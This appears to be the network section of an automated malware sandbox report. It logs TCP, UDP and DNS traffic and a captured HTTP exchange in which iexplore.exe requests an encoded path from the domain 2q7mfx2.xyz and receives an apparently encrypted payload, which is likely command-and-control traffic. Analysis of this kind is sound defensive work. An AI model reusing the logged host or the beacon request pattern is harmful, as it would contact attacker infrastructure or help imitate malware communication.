                                              Apr 12, 2021 15:25:06.419353008 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.419390917 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.419394970 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.419437885 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.419437885 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.419478893 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.419481039 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.419517040 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.419519901 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.419555902 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.419560909 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.419594049 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.419600964 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.419632912 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.419639111 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.419672012 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.419672966 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.419715881 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.419719934 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.419763088 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.419764042 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.419802904 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.419806957 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.419842005 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.419842005 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.419881105 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.419887066 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.419919014 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.419922113 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.419956923 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.419959068 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.419996977 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.420001984 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.420039892 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.420043945 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.420085907 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.420090914 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.420136929 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.420147896 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.420195103 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.420202971 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.420243025 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.420243979 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.420283079 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.420285940 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.420320988 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.420324087 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.420360088 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.420362949 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.420403004 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.420408010 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.420452118 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.420458078 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.420492887 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.420495987 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.420531034 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.420532942 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.420571089 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.420574903 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.420602083 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.420614958 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.420629978 CEST8049741142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:06.420641899 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:06.420682907 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:07.526192904 CEST4974180192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:07.526294947 CEST4974280192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:08.616070032 CEST4974380192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:08.616095066 CEST4974480192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:08.740902901 CEST8049743142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:08.742511034 CEST4974380192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:08.742588043 CEST8049744142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:08.742758036 CEST4974480192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:08.746000051 CEST4974380192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:08.870661020 CEST8049743142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:08.888124943 CEST8049743142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:08.888151884 CEST8049743142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:08.888168097 CEST8049743142.93.7.187192.168.2.3
                                              Apr 12, 2021 15:25:08.888324022 CEST4974380192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:08.888403893 CEST4974380192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:09.966922998 CEST4974480192.168.2.3142.93.7.187
                                              Apr 12, 2021 15:25:09.967046022 CEST4974380192.168.2.3142.93.7.187

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Apr 12, 2021 15:23:00.706065893 CEST6015253192.168.2.38.8.8.8
                                              Apr 12, 2021 15:23:00.754926920 CEST53601528.8.8.8192.168.2.3
                                              Apr 12, 2021 15:23:01.743762016 CEST5754453192.168.2.38.8.8.8
                                              Apr 12, 2021 15:23:01.792388916 CEST53575448.8.8.8192.168.2.3
                                              Apr 12, 2021 15:23:02.263736963 CEST5598453192.168.2.38.8.8.8
                                              Apr 12, 2021 15:23:02.322920084 CEST53559848.8.8.8192.168.2.3
                                              Apr 12, 2021 15:23:09.586616993 CEST6418553192.168.2.38.8.8.8
                                              Apr 12, 2021 15:23:09.638266087 CEST53641858.8.8.8192.168.2.3
                                              Apr 12, 2021 15:23:10.787715912 CEST6511053192.168.2.38.8.8.8
                                              Apr 12, 2021 15:23:10.844995975 CEST53651108.8.8.8192.168.2.3
                                              Apr 12, 2021 15:23:11.899132967 CEST5836153192.168.2.38.8.8.8
                                              Apr 12, 2021 15:23:11.948110104 CEST53583618.8.8.8192.168.2.3
                                              Apr 12, 2021 15:23:12.841348886 CEST6349253192.168.2.38.8.8.8
                                              Apr 12, 2021 15:23:12.890022993 CEST53634928.8.8.8192.168.2.3
                                              Apr 12, 2021 15:23:13.963922024 CEST6083153192.168.2.38.8.8.8
                                              Apr 12, 2021 15:23:14.012795925 CEST53608318.8.8.8192.168.2.3
                                              Apr 12, 2021 15:23:15.025738001 CEST6010053192.168.2.38.8.8.8
                                              Apr 12, 2021 15:23:15.085608959 CEST53601008.8.8.8192.168.2.3
                                              Apr 12, 2021 15:23:30.308027029 CEST5319553192.168.2.38.8.8.8
                                              Apr 12, 2021 15:23:30.357639074 CEST53531958.8.8.8192.168.2.3
                                              Apr 12, 2021 15:23:31.614057064 CEST5014153192.168.2.38.8.8.8
                                              Apr 12, 2021 15:23:31.675573111 CEST53501418.8.8.8192.168.2.3
                                              Apr 12, 2021 15:23:33.081099987 CEST5302353192.168.2.38.8.8.8
                                              Apr 12, 2021 15:23:33.130013943 CEST53530238.8.8.8192.168.2.3
                                              Apr 12, 2021 15:23:34.054116964 CEST4956353192.168.2.38.8.8.8
                                              Apr 12, 2021 15:23:34.105585098 CEST53495638.8.8.8192.168.2.3
                                              Apr 12, 2021 15:23:34.841895103 CEST5135253192.168.2.38.8.8.8
                                              Apr 12, 2021 15:23:34.914217949 CEST53513528.8.8.8192.168.2.3
                                              Apr 12, 2021 15:23:38.578038931 CEST5934953192.168.2.38.8.8.8
                                              Apr 12, 2021 15:23:38.626732111 CEST53593498.8.8.8192.168.2.3
                                              Apr 12, 2021 15:23:56.047646046 CEST5708453192.168.2.38.8.8.8
                                              Apr 12, 2021 15:23:56.096541882 CEST53570848.8.8.8192.168.2.3
                                              Apr 12, 2021 15:23:57.380353928 CEST5882353192.168.2.38.8.8.8
                                              Apr 12, 2021 15:23:57.439158916 CEST53588238.8.8.8192.168.2.3
                                              Apr 12, 2021 15:24:01.374420881 CEST5756853192.168.2.38.8.8.8
                                              Apr 12, 2021 15:24:01.423293114 CEST53575688.8.8.8192.168.2.3
                                              Apr 12, 2021 15:24:06.992815971 CEST5054053192.168.2.38.8.8.8
                                              Apr 12, 2021 15:24:07.064850092 CEST53505408.8.8.8192.168.2.3
                                              Apr 12, 2021 15:24:15.840255976 CEST5436653192.168.2.38.8.8.8
                                              Apr 12, 2021 15:24:15.899010897 CEST53543668.8.8.8192.168.2.3
                                              Apr 12, 2021 15:24:18.159683943 CEST5303453192.168.2.38.8.8.8
                                              Apr 12, 2021 15:24:18.239736080 CEST53530348.8.8.8192.168.2.3
                                              Apr 12, 2021 15:24:19.470577955 CEST5776253192.168.2.38.8.8.8
                                              Apr 12, 2021 15:24:19.551584959 CEST53577628.8.8.8192.168.2.3
                                              Apr 12, 2021 15:24:19.569940090 CEST5543553192.168.2.38.8.8.8
                                              Apr 12, 2021 15:24:19.632415056 CEST53554358.8.8.8192.168.2.3
                                              Apr 12, 2021 15:24:22.163717031 CEST5071353192.168.2.38.8.8.8
                                              Apr 12, 2021 15:24:22.212479115 CEST53507138.8.8.8192.168.2.3
                                              Apr 12, 2021 15:24:22.434473991 CEST5613253192.168.2.38.8.8.8
                                              Apr 12, 2021 15:24:22.494507074 CEST53561328.8.8.8192.168.2.3
                                              Apr 12, 2021 15:24:23.610680103 CEST5898753192.168.2.38.8.8.8
                                              Apr 12, 2021 15:24:23.660708904 CEST53589878.8.8.8192.168.2.3
                                              Apr 12, 2021 15:24:24.856631994 CEST5657953192.168.2.38.8.8.8
                                              Apr 12, 2021 15:24:24.906588078 CEST53565798.8.8.8192.168.2.3
                                              Apr 12, 2021 15:24:25.940203905 CEST6063353192.168.2.38.8.8.8
                                              Apr 12, 2021 15:24:25.988925934 CEST53606338.8.8.8192.168.2.3
                                              Apr 12, 2021 15:24:26.359051943 CEST6129253192.168.2.38.8.8.8
                                              Apr 12, 2021 15:24:26.423470974 CEST53612928.8.8.8192.168.2.3
                                              Apr 12, 2021 15:24:45.818052053 CEST6361953192.168.2.38.8.8.8
                                              Apr 12, 2021 15:24:45.879401922 CEST53636198.8.8.8192.168.2.3
                                              Apr 12, 2021 15:24:46.841341972 CEST6361953192.168.2.38.8.8.8
                                              Apr 12, 2021 15:24:46.899437904 CEST53636198.8.8.8192.168.2.3
                                              Apr 12, 2021 15:24:47.859688997 CEST6361953192.168.2.38.8.8.8
                                              Apr 12, 2021 15:24:47.918108940 CEST53636198.8.8.8192.168.2.3
                                              Apr 12, 2021 15:24:49.873609066 CEST6361953192.168.2.38.8.8.8
                                              Apr 12, 2021 15:24:49.932416916 CEST53636198.8.8.8192.168.2.3
                                              Apr 12, 2021 15:24:53.874862909 CEST6361953192.168.2.38.8.8.8
                                              Apr 12, 2021 15:24:53.934123993 CEST53636198.8.8.8192.168.2.3
                                              Apr 12, 2021 15:24:57.524413109 CEST6493853192.168.2.38.8.8.8
                                              Apr 12, 2021 15:24:57.575867891 CEST53649388.8.8.8192.168.2.3
                                              Apr 12, 2021 15:24:59.287909985 CEST6194653192.168.2.38.8.8.8
                                              Apr 12, 2021 15:24:59.352837086 CEST53619468.8.8.8192.168.2.3
                                              Apr 12, 2021 15:25:01.664540052 CEST6491053192.168.2.38.8.8.8
                                              Apr 12, 2021 15:25:01.713258982 CEST53649108.8.8.8192.168.2.3
                                              Apr 12, 2021 15:25:02.675496101 CEST5212353192.168.2.38.8.8.8
                                              Apr 12, 2021 15:25:02.756053925 CEST53521238.8.8.8192.168.2.3
                                              Apr 12, 2021 15:25:05.522825956 CEST5613053192.168.2.38.8.8.8
                                              Apr 12, 2021 15:25:05.597975016 CEST53561308.8.8.8192.168.2.3
                                              Apr 12, 2021 15:25:08.548417091 CEST5633853192.168.2.38.8.8.8
                                              Apr 12, 2021 15:25:08.605376005 CEST53563388.8.8.8192.168.2.3
                                              Apr 12, 2021 15:25:19.387145996 CEST5942053192.168.2.38.8.8.8
                                              Apr 12, 2021 15:25:19.435950041 CEST53594208.8.8.8192.168.2.3
                                              Apr 12, 2021 15:25:21.507421970 CEST5942453192.168.2.38.8.8.8
                                              Apr 12, 2021 15:25:21.556360006 CEST53594248.8.8.8192.168.2.3
                                              Apr 12, 2021 15:25:21.557013035 CEST5942553192.168.2.38.8.8.8
                                              Apr 12, 2021 15:25:21.614744902 CEST53594258.8.8.8192.168.2.3

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Apr 12, 2021 15:25:02.675496101 CEST192.168.2.38.8.8.80xb583Standard query (0)2q7mfx2.xyzA (IP address)IN (0x0001)
                                              Apr 12, 2021 15:25:05.522825956 CEST192.168.2.38.8.8.80x360Standard query (0)2q7mfx2.xyzA (IP address)IN (0x0001)
                                              Apr 12, 2021 15:25:08.548417091 CEST192.168.2.38.8.8.80x571bStandard query (0)2q7mfx2.xyzA (IP address)IN (0x0001)
                                              Apr 12, 2021 15:25:19.387145996 CEST192.168.2.38.8.8.80x1254Standard query (0)resolver1.opendns.comA (IP address)IN (0x0001)
                                              Apr 12, 2021 15:25:21.507421970 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                              Apr 12, 2021 15:25:21.557013035 CEST192.168.2.38.8.8.80x2Standard query (0)1.0.0.127.in-addr.arpaPTR (Pointer record)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Apr 12, 2021 15:25:02.756053925 CEST8.8.8.8192.168.2.30xb583No error (0)2q7mfx2.xyz142.93.7.187A (IP address)IN (0x0001)
                                              Apr 12, 2021 15:25:05.597975016 CEST8.8.8.8192.168.2.30x360No error (0)2q7mfx2.xyz142.93.7.187A (IP address)IN (0x0001)
                                              Apr 12, 2021 15:25:08.605376005 CEST8.8.8.8192.168.2.30x571bNo error (0)2q7mfx2.xyz142.93.7.187A (IP address)IN (0x0001)
                                              Apr 12, 2021 15:25:19.435950041 CEST8.8.8.8192.168.2.30x1254No error (0)resolver1.opendns.com208.67.222.222A (IP address)IN (0x0001)
                                              Apr 12, 2021 15:25:21.556360006 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                              Apr 12, 2021 15:25:21.614744902 CEST8.8.8.8192.168.2.30x2Name error (3)1.0.0.127.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • 2q7mfx2.xyz

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.349739142.93.7.18780C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                              TimestampkBytes transferredDirectionData
                                              Apr 12, 2021 15:25:02.902010918 CEST5589OUTGET /ddsadasdsaasdasdasd/nCQsOTqfa/4drLDa3auEFQqSoE0vyq/5xI8GCN1yHL5YcN3EBj/mfCnwe6xtjDp36cmouaBCM/5WXgtFq_2BgKp/PDd6mPao/VUS6J3k6OdP2bm_2B0Sh5Sb/v4qaeiBWrX/itXnEXJVNYim4ybL5/cIrwdun4JuQa/iFtQQTarJN7/ou3bA61QNiTDuh/w23BEo_2BStwd/6tUmvLY.pal HTTP/1.1
                                              Accept: text/html, application/xhtml+xml, image/jxr, */*
                                              Accept-Language: en-US
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Accept-Encoding: gzip, deflate
                                              Host: 2q7mfx2.xyz
                                              Connection: Keep-Alive
                                              Apr 12, 2021 15:25:03.051784992 CEST5590INHTTP/1.1 200 OK
                                              Date: Mon, 12 Apr 2021 13:25:02 GMT
                                              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                              X-Powered-By: PHP/5.4.16
                                              Set-Cookie: PHPSESSID=626b5h9nvpj75et1g5p6lfetg6; path=/; domain=.2q7mfx2.xyz
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                              Pragma: no-cache
                                              Set-Cookie: lang=en; expires=Wed, 12-May-2021 13:25:02 GMT; path=/; domain=.2q7mfx2.xyz
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 33 38 64 62 63 0d 0a 63 41 39 52 2f 45 6b 57 41 61 54 58 66 7a 6b 65 58 4b 59 62 38 4f 50 37 62 55 4c 32 55 48 43 66 61 76 4b 33 62 45 57 33 66 6e 75 58 2f 7a 70 2b 66 2f 30 61 4d 4d 37 48 62 4f 68 71 50 7a 35 61 4f 30 63 48 52 66 4c 74 54 35 51 51 61 71 7a 4a 4a 34 5a 4e 73 70 6f 62 35 4b 4e 6e 38 47 64 34 42 45 4d 32 64 42 6b 51 79 58 43 38 51 32 39 65 43 59 38 70 64 49 69 65 66 53 36 46 31 45 58 32 4f 59 69 44 43 2f 32 4e 79 63 7a 4b 5a 48 50 4f 6a 31 47 6d 30 49 31 78 6f 5a 61 67 65 45 53 47 79 79 67 34 57 62 6a 4a 55 53 58 6a 6d 66 70 47 74 71 48 68 75 7a 6f 67 72 68 75 2f 72 59 37 78 59 64 42 69 37 41 4d 51 6b 47 4d 42 6b 70 68 2f 6d 4a 45 62 37 62 67 49 55 44 2f 63 42 54 6b 6d 41 32 52 46 61 6b 65 77 73 43 6f 65 4b 59 63 73 6e 39 76 48 66 72 4c 35 78 51 32 62 73 46 63 77 41 32 6c 44 66 49 31 47 72 76 30 2b 47 42 30 58 46 6e 63 64 42 47 4c 4e 35 74 72 62 72 70 78 70 70 71 68 4f 4f 49 39 59 62 64 73 30 4f 58 4e 78 6b 31 4d 2b 65 41 4a 77 51 58 75 7a 54 77 33 4a 4a 6d 37 38 63 34 2f 77 54 68 77 53 78 52 35 61 65 61 73 4c 34 33 34 4f 4f 41 58 6c 79 64 48 74 57 61 34 46 55 79 45 52 34 55 78 46 41 68 51 72 4f 4b 41 6e 31 2b 73 62 61 67 2b 4a 49 2f 4e 47 70 75 34 58 45 59 70 47 70 58 77 74 47 66 6c 65 2b 68 41 31 53 63 49 74 76 33 68 4d 68 79 78 70 77 4b 71 4f 46 73 4c 31 49 72 71 2f 57 4a 4d 6a 7a 55 50 4c 61 6a 76 38 66 78 6a 4c 69 5a 6f 47 4c 7a 70 36 34 53 50 53 52 75 70 42 51 56 5a 53 64 48 78 78 52 2f 4f 57 45 73 59 31 45 2b 44 30 54 45 47 6f 38 6c 63 41 44 52 64 70 6b 59 52 34 38 67 62 36 44 31 57 65 33 2f 72 76 53 66 42 36 53 57 47 58 53 2b 74 4a 61 57 74 56 31 32 6d 73 2b 75 36 4f 4b 4e 4c 58 4c 55 34 41 79 31 42 43 62 50 78 56 64 38 66 4a 70 42 4f 69 44 51 79 4f 4d 43 6f 48 54 51 47 77 6a 4e 76 39 72 31 33 77 74 53 51 76 53 70 4b 2b 64 51 61 46 49 66 49 44 35 65 4b 30 72 61 47 42 58 47 6a 75 35 58 6a 37 44 36 4a 76 39 54 4b 64 77 36 45 61 74 65 78 73 64 4d 2f 59 77 4a 30 70 37 31 65 4c 78 30 4c 55 67 42 69 75 62 42 35 45 44 35 52 2b 4f 53 73 76 2b 56 4d 70 79 6a 62 49 68 77 64 43 6e 5a 32 61 64 4d 61 6b 58 63 2b 2b 4e 6f 30 42 67 6b 42 43 48 68 32 30 62 33 41 63 65 77 38 69 42 63 39 58 4b 31 53 6d 50 78 58 58 66 45 36 51 50 74 6b 44 31 51 37 39 77 4e 78 30 73 57 45 45 30 34 69 61 58 35 6b 79 2f 35 7a 4f 58 6c 70 30 46 35 51 46 48 6b 37 71 4d 66 41 72 6b 38 61 79 4b 50 68 68 42 4c 68 74 30 78 68 74 7a 44
                                              Data Ascii: 38dbccA9R/EkWAaTXfzkeXKYb8OP7bUL2UHCfavK3bEW3fnuX/zp+f/0aMM7HbOhqPz5aO0cHRfLtT5QQaqzJJ4ZNspob5KNn8Gd4BEM2dBkQyXC8Q29eCY8pdIiefS6F1EX2OYiDC/2NyczKZHPOj1Gm0I1xoZageESGyyg4WbjJUSXjmfpGtqHhuzogrhu/rY7xYdBi7AMQkGMBkph/mJEb7bgIUD/cBTkmA2RFakewsCoeKYcsn9vHfrL5xQ2bsFcwA2lDfI1Grv0+GB0XFncdBGLN5trbrpxppqhOOI9Ybds0OXNxk1M+eAJwQXuzTw3JJm78c4/wThwSxR5aeasL434OOAXlydHtWa4FUyER4UxFAhQrOKAn1+sbag+JI/NGpu4XEYpGpXwtGfle+hA1ScItv3hMhyxpwKqOFsL1Irq/WJMjzUPLajv8fxjLiZoGLzp64SPSRupBQVZSdHxxR/OWEsY1E+D0TEGo8lcADRdpkYR48gb6D1We3/rvSfB6SWGXS+tJaWtV12ms+u6OKNLXLU4Ay1BCbPxVd8fJpBOiDQyOMCoHTQGwjNv9r13wtSQvSpK+dQaFIfID5eK0raGBXGju5Xj7D6Jv9TKdw6EatexsdM/YwJ0p71eLx0LUgBiubB5ED5R+OSsv+VMpyjbIhwdCnZ2adMakXc++No0BgkBCHh20b3Acew8iBc9XK1SmPxXXfE6QPtkD1Q79wNx0sWEE04iaX5ky/5zOXlp0F5QFHk7qMfArk8ayKPhhBLht0xhtzD
                                              Apr 12, 2021 15:25:03.051810026 CEST5592INData Raw: 78 2b 36 42 71 43 44 77 4d 70 73 37 71 72 62 70 79 71 31 4c 41 64 32 43 50 67 44 68 6e 75 54 73 31 67 43 72 31 30 45 76 46 6f 45 66 43 6c 56 45 54 65 59 2f 53 6d 39 6d 63 4f 33 56 46 6f 78 6b 6c 71 4d 78 4e 34 51 74 33 79 45 6e 6a 59 7a 38 6e 31
                                              Data Ascii: x+6BqCDwMps7qrbpyq1LAd2CPgDhnuTs1gCr10EvFoEfClVETeY/Sm9mcO3VFoxklqMxN4Qt3yEnjYz8n1YfDhjzAEDmtLaQFANprdyPz/YrewoFtrR1m7+I1HasBLadkBiY9XRb1WeVF0m2GcuOxsoIn3MAlkJlzi7H+PFpJWCYV6SLmKR6AFGxfQMWVrjhGQwrgrHO9K9U5CD0VG7dMdNHyQDvZaI0lfalu8CDFktGJI/akK9
                                              Apr 12, 2021 15:25:03.051826000 CEST5593INData Raw: 55 45 4b 34 30 78 73 5a 78 39 71 78 47 48 6c 35 68 4a 65 2f 78 62 4a 72 33 78 39 50 4b 37 65 65 35 6a 34 6a 79 59 6a 57 55 51 39 31 34 41 46 61 4b 33 44 66 6a 55 46 59 70 50 67 5a 5a 4d 30 79 79 34 6f 6a 53 66 4a 59 72 6b 6b 44 38 30 66 78 31 57
                                              Data Ascii: UEK40xsZx9qxGHl5hJe/xbJr3x9PK7ee5j4jyYjWUQ914AFaK3DfjUFYpPgZZM0yy4ojSfJYrkkD80fx1WvX9qDcZGBIb/D0/9/Bc2km4U+80TPO7bGlmkp8T+ZyuabfWynhysdQt6c2VYe34kV6haWfYE4q2WmNNRgnaYdtE7J88I7992Jp6jLxrZDMBhtn+ihAhfSM6vBpK/C7Ba9A5IRjMaVHHPzraZ067eWH1T2tltY7quY
                                              Apr 12, 2021 15:25:03.051841974 CEST5594INData Raw: 7a 71 75 6c 6d 61 59 57 32 51 59 6e 67 42 51 65 67 51 44 6c 35 71 34 6e 31 74 33 41 4e 39 52 38 75 55 68 75 6d 64 62 4c 2b 76 6f 64 75 75 59 43 30 6f 6c 6f 32 58 4e 45 6a 68 45 50 4f 68 38 38 52 39 58 4b 49 79 32 4b 52 4c 4e 30 32 56 64 76 5a 31
                                              Data Ascii: zqulmaYW2QYngBQegQDl5q4n1t3AN9R8uUhumdbL+voduuYC0olo2XNEjhEPOh88R9XKIy2KRLN02VdvZ1osVItXvClXn+Y7PQV/yJQe86vyAgRs3MlbKjoloEg89oZXnZnHyISVyWPwGQs1h2DXD2gB423Yt1nnEAZAmGFMKgfy6kHUM7xQP9vJw8K9K9S+hZElkXPJMrlUrmsclvMEyK5Q3H8pRkV1GEuTXCABkflc+wcF/c2
                                              Apr 12, 2021 15:25:03.051856995 CEST5596INData Raw: 52 2f 61 51 46 52 71 6f 7a 2f 6d 45 47 75 62 42 35 6e 44 45 5a 33 50 43 4c 42 33 30 34 70 6d 34 73 6f 47 61 70 63 78 2f 53 45 37 6c 79 4f 54 69 69 30 4b 6e 48 31 4f 34 47 4f 2b 47 72 30 35 45 34 61 68 54 53 66 68 4a 44 39 32 55 74 55 4d 42 30 63
                                              Data Ascii: R/aQFRqoz/mEGubB5nDEZ3PCLB304pm4soGapcx/SE7lyOTii0KnH1O4GO+Gr05E4ahTSfhJD92UtUMB0cuzc57E+xLQR1BMD1tpcSkysCTKIkJcboMNADi/Ep4x7Mxf37rinZ3E0fRj1QdG4wjxSTbt4g9G49iM9KdZx99dVh8jU1dVfJ8Y19I2dE3KbhI50C3U7HcDU4FtPXjQTIAAFzaTc9u30NZRRs0B3WuU1Gkw3f6rLQn
                                              Apr 12, 2021 15:25:03.051872969 CEST5597INData Raw: 61 70 78 4f 4d 4e 33 50 66 6d 50 33 45 4a 6a 61 70 6a 6e 56 73 45 31 43 33 49 77 66 2b 6b 51 41 4c 45 52 6f 64 41 37 2f 63 56 6a 30 68 52 33 4e 51 4f 47 42 58 44 43 56 68 59 68 50 35 39 37 62 6b 59 57 6a 78 54 53 55 78 4d 62 71 76 35 79 38 77 7a
                                              Data Ascii: apxOMN3PfmP3EJjapjnVsE1C3Iwf+kQALERodA7/cVj0hR3NQOGBXDCVhYhP597bkYWjxTSUxMbqv5y8wzYutTGF8431dxnr6VkMwMRh9ioMbmxc6MplWrJql27yMYFNafbWtOr6WzsH57zLA7WPBOKo1bZqv1G67IWDLhpuBSYzzUdEtWqE4kA2RduASs2AJEi3Y+ustVH80QZ550Cz7Qkt1q/frB6hAL/RxQwH2eD5D0nhgpk
                                              Apr 12, 2021 15:25:03.051888943 CEST5598INData Raw: 39 64 55 61 32 74 6f 42 6a 55 48 66 65 66 42 6a 75 49 61 64 38 48 5a 53 7a 5a 34 30 52 72 37 69 67 50 4d 76 36 48 46 54 37 61 33 51 74 6d 67 31 6f 6e 34 79 72 32 30 4b 70 37 4c 48 46 70 6e 38 58 46 57 68 42 79 75 70 64 36 68 69 74 68 71 2b 32 38
                                              Data Ascii: 9dUa2toBjUHfefBjuIad8HZSzZ40Rr7igPMv6HFT7a3Qtmg1on4yr20Kp7LHFpn8XFWhByupd6hithq+28oikprDRGmAJwZHj7S5mD5PmMpnZetlZC2E3Q2X463M9pkhXOEd4B7XtwHUbCmuqkSmyAy9GlT8FAKwoSh3zXesPqModjghUz9unbwZBXEjxvlbDgA1OkyuPz5iagGT6X5mG/kEWZH8iil1dA+lh+78nzGHaDFYsGx
                                              Apr 12, 2021 15:25:03.051907063 CEST5600INData Raw: 4a 47 6d 36 4b 32 71 6d 71 4b 71 43 48 6c 77 6d 48 34 72 65 36 74 79 59 67 47 51 35 6c 33 41 4c 6b 34 72 75 72 66 32 34 6d 57 48 41 42 52 52 6d 65 41 56 53 44 76 54 47 35 76 33 44 72 68 77 36 78 61 53 64 59 55 39 58 69 79 5a 4d 53 4f 79 50 6c 64
